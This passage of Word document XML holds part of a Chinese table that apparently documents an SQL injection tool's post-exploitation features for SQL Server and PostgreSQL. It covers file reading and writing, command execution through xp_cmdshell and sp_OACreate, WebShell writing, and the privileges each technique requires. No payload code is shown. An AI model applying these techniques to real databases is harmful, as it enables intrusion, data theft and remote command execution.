              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="746A8504">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FileSystemObject（sp_OACreate）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="3399BFB8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="571AE9AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin + Ole Automation（工具自动开启）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="013F83E2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="549B4C50"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5164BC6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="591172C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>BULK INSERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="24500EAA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S 建表 + 全通道取数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="125D9B0A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin / bulkadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0A5871F6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="75A3D506"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="1E76535C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="48AC7940">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OPENROWSET SINGLE_BLOB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="38A71388">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S 建表 + 全通道取数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="4D8EEB42">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin + Ad Hoc Distributed Queries（工具自动开启）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="54F078A0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="390902A8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="14396A98">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0E01670A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FileSystemObject 写 / Sp_MakeWebTask / 备份写 WebShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7C1E877E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5D80EDC0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin（Sp_MakeWebTask 在 2012+ 已移除，失败明确提示）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6A3AE3F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="0E372CBE"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="17740888">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="517E9B6C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ADODB.Stream 二进制写（临时表 varbinary 分片聚合，写后 datalength 验证）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="65E1C0A8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="6E9F5A18">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin + Ole Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="27B61AAA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2F163288"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1DAB0256">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="29627ABE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>xp_cmdshell（自动 sp_configure 开启组件）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="258112EE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6BF929D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin；仅 Windows 版 SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4A5CA078">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="1A4441D8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="46F37AFC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="35837E26">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sp_OACreate(wscript.shell) 兜底（xp 被删时用，输出经 BULK INSERT 回读）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="4C9A3020">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="6C26FF3C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sysadmin + Ole Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="0BC7F0CE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="460555AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="788459DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3DD45372">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="554E43A6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="7FD591B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser 或 pg_read_server_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="07BB59F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7B836F2C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="3B138C6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="6947E7A0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>大对象 lo_import + encode hex 分页</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="54731B6A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U / E / S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="0C42F666">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser 或 pg_read_server_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="49504BC0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="3669484A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5A48A79A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4A3A5362">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY TO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="62309E86">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6BA366A2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser 或 pg_write_server_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="42EF826C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="2C1A5E56"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="3BCF9B80">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="2E56158A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>大对象 lo_from_bytea / lo_export（小文件单发，大文件分片，导出前字节数校验）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="3D6FBF2E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U / E 单发、S 分片</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="74B8C7EC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>superuser 或 pg_write_server_files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="4D15478C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
